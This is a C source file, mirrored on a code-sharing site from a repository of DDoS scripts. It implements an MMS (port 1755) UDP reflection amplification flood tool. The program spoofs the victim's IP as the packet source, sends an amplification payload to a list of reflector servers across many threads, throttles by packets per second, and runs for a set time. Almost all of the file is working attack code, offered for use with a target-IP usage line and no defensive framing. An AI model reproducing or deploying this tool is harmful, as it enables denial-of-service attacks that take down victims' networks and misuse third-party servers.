Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/DDOS Scripts/AMP Methods/MMS Amplifcation - 1755/mms.c
4622 views
1
/* 

2
	MMS (Microsoft Media Server Protocol) Amplification Script, made / found by googleadmin

3
 */

4


5
#include <time.h>

6
#include <pthread.h>

7
#include <unistd.h>

8
#include <stdio.h>

9
#include <stdlib.h>

10
#include <string.h>

11
#include <sys/socket.h>

12
#include <netinet/ip.h>

13
#include <netinet/udp.h>

14
#include <arpa/inet.h>

15
#define MAX_PACKET_SIZE 8192

16
#define PHI 0x9e3779b9

17
static uint32_t Q[4096], c = 362436;

18
static const char PAYLOAD[] = "\x8f\xcd\x00\x09\x00\x00\x00\x00\x53\x90\xa0\x44\x33\xfb\xd6\x55\x3c\x38\xed\xb8\xc2\x15\xd4\x94\x00\xf6\xc0\x78\xe0\x21\xc3\xd4\x96\xe5\x47\x14\x29\x3b\x0c\x45\xde\x9b\x55\xa4\xbc\xb5\x64\xdd\xc4\xf0\x3f\xcd\x33\xbe\x76\xb2\xec\x0e\x00\x00";

19
static unsigned int PAYLOADSIZE = sizeof(PAYLOAD);

20
struct list

21
{

22
	struct sockaddr_in data;

23
	struct list *next;

24
	struct list *prev;

25
};

26
struct list *head;

27
volatile int tehport;

28
volatile int limiter;

29
volatile unsigned int pps;

30
volatile unsigned int sleeptime = 100;

31
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };

32
void init_rand(uint32_t x)

33
{

34
	int i;

35
	Q[0] = x;

36
	Q[1] = x + PHI;

37
	Q[2] = x + PHI + PHI;

38
	for (i = 3; i < 4096; i++)

39
	{

40
	Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;

41
	}

42
}

43
uint32_t rand_cmwc(void)

44
{

45
	uint64_t t, a = 18782LL;

46
	static uint32_t i = 4095;

47
	uint32_t x, r = 0xfffffffe;

48
	i = (i + 1) & 4095;

49
	t = a * Q[i] + c;

50
	c = (t >> 32);

51
	x = t + c;

52
	if (x < c) {

53
	x++;

54
	c++;

55
	}

56
	return (Q[i] = r - x);

57
}

58
unsigned short csum (unsigned short *buf, int nwords)

59
{

60
	unsigned long sum = 0;

61
	for (sum = 0; nwords > 0; nwords--)

62
	sum += *buf++;

63
	sum = (sum >> 16) + (sum & 0xffff);

64
	sum += (sum >> 16);

65
	return (unsigned short)(~sum);

66
}

67
void setup_ip_header(struct iphdr *iph)

68
{

69
	iph->ihl = 5;

70
	iph->version = 4;

71
	iph->tos = 0;

72
	iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + PAYLOADSIZE;

73
	iph->id = htonl(54321);

74
	iph->frag_off = 0;

75
	iph->ttl = MAXTTL;

76
	iph->protocol = IPPROTO_UDP;

77
	iph->check = 0;

78
	iph->saddr = inet_addr("192.168.3.100");

79
}

80
void setup_udp_header(struct udphdr *udph)

81
{

82
	udph->source = htons(5678);

83
	udph->dest = htons(1755);

84
        udph->check = 0;

85
        memcpy((void *)udph + sizeof(struct udphdr), PAYLOAD, PAYLOADSIZE);

86
        udph->len=htons(sizeof(struct udphdr) + PAYLOADSIZE);

87
}

88
void *flood(void *par1)

89
{

90
	struct thread_data *td = (struct thread_data *)par1;

91
	char datagram[MAX_PACKET_SIZE];

92
	struct iphdr *iph = (struct iphdr *)datagram;

93
	struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);

94
	struct sockaddr_in sin = td->sin;

95
	struct  list *list_node = td->list_node;

96
	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);

97
	if(s < 0){

98
	fprintf(stderr, "Could not open raw socket.\n");

99
	exit(-1);

100
	}

101
	init_rand(time(NULL));

102
	memset(datagram, 0, MAX_PACKET_SIZE);

103
	setup_ip_header(iph);

104
	setup_udp_header(udph);

105
	udph->source = htons(rand() % 65535 - 1026);

106
	iph->saddr = sin.sin_addr.s_addr;

107
	iph->daddr = list_node->data.sin_addr.s_addr;

108
	iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);

109
	int tmp = 1;

110
	const int *val = &tmp;

111
	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){

112
	fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");

113
	exit(-1);

114
	}

115
	init_rand(time(NULL));

116
	register unsigned int i;

117
	i = 0;

118
	while(1){

119
		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));

120
		list_node = list_node->next;

121
		iph->daddr = list_node->data.sin_addr.s_addr;

122
		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);

123
		iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);

124
		

125
		pps++;

126
		if(i >= limiter)

127
		{

128
			i = 0;

129
			usleep(sleeptime);

130
		}

131
		i++;

132
	}

133
}

134
int main(int argc, char *argv[ ])

135
{

136
	if(argc < 6){

137
	fprintf(stderr, "Invalid parameters!\n");

138
	fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);

139
		exit(-1);

140
	}

141
	srand(time(NULL));

142
	int i = 0;

143
	head = NULL;

144
	fprintf(stdout, "Setting up sockets...\n");

145
	int max_len = 128;

146
	char *buffer = (char *) malloc(max_len);

147
	buffer = memset(buffer, 0x00, max_len);

148
	int num_threads = atoi(argv[4]);

149
	int maxpps = atoi(argv[5]);

150
	limiter = 0;

151
	pps = 0;

152
	int multiplier = 20;

153
	FILE *list_fd = fopen(argv[3],  "r");

154
	while (fgets(buffer, max_len, list_fd) != NULL) {

155
		if ((buffer[strlen(buffer) - 1] == '\n') ||

156
				(buffer[strlen(buffer) - 1] == '\r')) {

157
			buffer[strlen(buffer) - 1] = 0x00;

158
			if(head == NULL)

159
			{

160
				head = (struct list *)malloc(sizeof(struct list));

161
				bzero(&head->data, sizeof(head->data));

162
				head->data.sin_addr.s_addr=inet_addr(buffer);

163
				head->next = head;

164
				head->prev = head;

165
			} else {

166
				struct list *new_node = (struct list *)malloc(sizeof(struct list));

167
				memset(new_node, 0x00, sizeof(struct list));

168
				new_node->data.sin_addr.s_addr=inet_addr(buffer);

169
				new_node->prev = head;

170
				new_node->next = head->next;

171
				head->next = new_node;

172
			}

173
			i++;

174
		} else {

175
			continue;

176
		}

177
	}

178
	struct list *current = head->next;

179
	pthread_t thread[num_threads];

180
	struct sockaddr_in sin;

181
	sin.sin_family = AF_INET;

182
	sin.sin_addr.s_addr = inet_addr(argv[1]);

183
	struct thread_data td[num_threads];

184
	for(i = 0;i<num_threads;i++){

185
		td[i].thread_id = i;

186
		td[i].sin= sin;

187
		td[i].list_node = current;

188
		pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);

189
	}

190
	fprintf(stdout, "Starting flood...\n");

191
	for(i = 0;i<(atoi(argv[6])*multiplier);i++)

192
	{

193
		usleep((1000/multiplier)*1000);

194
		if((pps*multiplier) > maxpps)

195
		{

196
			if(1 > limiter)

197
			{

198
				sleeptime+=100;

199
			} else {

200
				limiter--;

201
			}

202
		} else {

203
			limiter++;

204
			if(sleeptime > 25)

205
			{

206
				sleeptime-=25;

207
			} else {

208
				sleeptime = 0;

209
			}

210
		}

211
		pps = 0;

212
	}

213
	return 0;

214
}

215